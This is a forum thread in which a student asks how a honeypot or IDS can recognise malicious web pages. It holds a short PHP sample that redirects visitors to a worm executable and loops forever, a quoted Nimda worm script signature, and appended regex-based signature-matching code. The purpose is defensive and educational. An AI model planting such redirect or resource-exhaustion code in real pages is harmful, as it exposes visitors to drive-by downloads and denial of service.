I want some help.
My question is "how can an intrusion detection
system (IDS) analyse the web pages in order to identify
malicious ones"?
I know that the system can monitor the changes
on the registry, file system, etc. But I
ask about the second way in which the system knows
the content of the page.
In other words
"what are the features or properties of malicious
web pages"?
"Is it necessary to know all features of all computer worms, viruses, trojan horses, etc.? If so, I want help in how I can indicate the features of each".
Thank you.
How can an IDS detect malicious web pages?
Page 1 of 1 | 8 Replies - 1538 Views - Last Post: 14 June 2009 - 02:43 AM
Replies To: How can an IDS detect malicious web pages?
#2
Re: How can an IDS detect malicious web pages?
Posted 03 May 2009 - 03:17 PM
Sounds like someone's homework.
#3
Re: How can an IDS detect malicious web pages?
Posted 04 May 2009 - 12:18 PM
naseem.fci, on 3 May, 2009 - 03:23 PM, said:
my question is "how can an intrusion detection
system (IDS) analyse the web pages in order to identify
malicious ones"?
An IDS detects intrusions, hence the name. It doesn't look at websites.
BlakeJustBlake, on 3 May, 2009 - 04:17 PM, said:
Sounds like someone's homework.
That explains why it was posted in *Student Campus*
I'll move it to Networking.
#4
Re: How can an IDS detect malicious web pages?
Posted 05 May 2009 - 05:32 AM
It seems that you don't understand me!
I will explain:
I'm a student in the faculty of computer and information sciences. We are asked to do team work projects; I'm a member of the group for the "honey net" project. We have source code that simulates a honeypot which visits an initial specified web page, checks it, then collects the links inside it in order to visit each one next, and repeats this for every page.
The honeypot runs each visited page and monitors the changes in memory and CPU resources; it also checks for file system changes. It puts limits on the consumption of each resource; if these limits are exceeded it decides that the visited page is malicious.
The future work that we want to achieve is to make the honeypot analyse the web page and examine its content in order to know if it contains a computer worm, virus, trojan horse, etc.
I was asked to do a search to find specific features of the pages that contain harmful content.
I searched for that, but I found that most information talks about the harmful effects of those malicious contents; I can't extract the specific features or properties of the malicious contents, so I don't know how the honeypot can detect these pages.
I don't want you to do my work; but I asked for ideas or starting points after which I can continue in a right way.
thanks.
#5
Re: How can an IDS detect malicious web pages?
Posted 07 May 2009 - 04:24 PM
Pretty much anything on a web page can contain harmful content - links, images, even forum posts. Both server side and client side code can be used in attacks. You'll need a way of monitoring what's being sent to and from your test computer and through which ports, in addition to the features that you already mentioned.
I can't really give you any examples without flirting with the forum policy on hacking - send me an email via my blog and I'll send you some links if you want them.
-n
#6
Re: How can an IDS detect malicious web pages?
Posted 04 June 2009 - 05:56 PM
php pages can be used maliciously, so it could pick a certain web page using up more CPU than what it should or whether it has automated links to download files onto a computer, an example of this would be:
<?php
// automated download: redirect the browser to an executable
header("Location: http://www.page.com/worm.exe");
// extensive CPU usage: a loop that never ends
$i = 0;
do { $i = $i + 1; } while (true);
?>
javascript could also easily be used to write malicious code.
so IDS could pick up an automated file being downloaded....
ummm....yea not too sure, that is what it could pick up, but that isn't how it would pick it up
#7
Re: How can an IDS detect malicious web pages?
Posted 14 June 2009 - 12:39 AM
numeric, on 7 May, 2009 - 03:24 PM, said:
Pretty much anything on a web page can contain harmful content - links, images, even forum posts. Both server side and client side code can be used in attacks. You'll need a way of monitoring what's being sent to and from your test computer and through which ports, in addition to the features that you already mentioned.
I can't really give you any examples without flirting with the forum policy on hacking - send me an email via my blog and I'll send you some links if you want them.
-n
So sorry for the late reply.
I was in exams.
Thanks very much for your offer.
I will send you an e-mail.
DingleNutZ, on 4 Jun, 2009 - 04:56 PM, said:
php pages can be used maliciously, so it could pick a certain web page using up more CPU than what it should or whether it has automated links to download files onto a computer, an example of this would be:
<?php
// automated download: redirect the browser to an executable
header("Location: http://www.page.com/worm.exe");
// extensive CPU usage: a loop that never ends
$i = 0;
do { $i = $i + 1; } while (true);
?>
javascript could also easily be used to write malicious code.
so IDS could pick up an automated file being downloaded....
ummm....yea not too sure, that is what it could pick up, but that isn't how it would pick it up
Thanks very much.
We have some progress in our project.
I will explain in the next reply.
#8
Re: How can an IDS detect malicious web pages?
Posted 14 June 2009 - 01:17 AM
We have arrived at a specific point in our project.
Each internet worm or virus has its own signature. We decided to search for these signatures and use them as a criterion that distinguishes a malicious page from others.
We already have some signatures, such as
*the signature of the Nimda worm:-
<script language="Javascript">
window.open("readme.eml",null,"resizable=no, top=6000, left=6000")
</script>
My question here is: can we pass this signature to a method in our code so that the system can check for this text in the web page, or must we use a regular expression for each signature?
Sorry for the nuisance.
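Added example, not part of the original thread and not the project's honeypot code: one way to handle the question in post #8 is to keep signatures as plain literals and generate a tolerant regular expression from each one, so a copy with different spacing, case or quote style still matches. The function names and sample pages are assumptions constructed for illustration; the signature is the Nimda string from the post, written with `window.open`.

```python
import re

# Signature literal as quoted in the thread (Nimda's injected script call).
SIGNATURES = {
    "nimda-readme-eml":
        'window.open("readme.eml",null,"resizable=no, top=6000, left=6000")',
}

def compile_signature(literal):
    """Build a regex from a literal signature that ignores case, quote style
    and whitespace between tokens, so no regex is hand-written per entry."""
    parts = []
    for tok in re.findall(r"\w+|[^\w\s]", literal):
        # Either quote character is accepted; everything else is escaped.
        parts.append("[\"']" if tok in ('"', "'") else re.escape(tok))
    return re.compile(r"\s*".join(parts), re.IGNORECASE)

COMPILED = {name: compile_signature(sig) for name, sig in SIGNATURES.items()}

def scan_exact(html):
    """Plain substring search: finds only character-for-character copies."""
    return [name for name, sig in SIGNATURES.items() if sig in html]

def scan_tolerant(html):
    """Search with the generated patterns."""
    return [name for name, rx in COMPILED.items() if rx.search(html)]

# Constructed sample pages (not captured traffic).
PAGE_EXACT = ('<html><script language="Javascript">\n'
              'window.open("readme.eml",null,"resizable=no, top=6000, left=6000")\n'
              '</script></html>')
PAGE_REFORMATTED = ("<html><script language=\"JavaScript\">"
                    "window.open( 'readme.eml', null, "
                    "'resizable=no,top=6000,left=6000' )</script></html>")
PAGE_CLEAN = '<html><script>window.open("help.html")</script></html>'

if __name__ == "__main__":
    for label, page in (("exact", PAGE_EXACT),
                        ("reformatted", PAGE_REFORMATTED),
                        ("clean", PAGE_CLEAN)):
        print(label, scan_exact(page), scan_tolerant(page))
```

The substring search misses the reformatted page while the generated pattern flags it; both approaches only recognise strings that are already in the signature list.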
#9
Re: How can an IDS detect malicious web pages?
Posted 14 June 2009 - 02:43 AM
Sorry numeric, it seems that I misunderstood what your blog means!
Please tell me how I can send you an e-mail.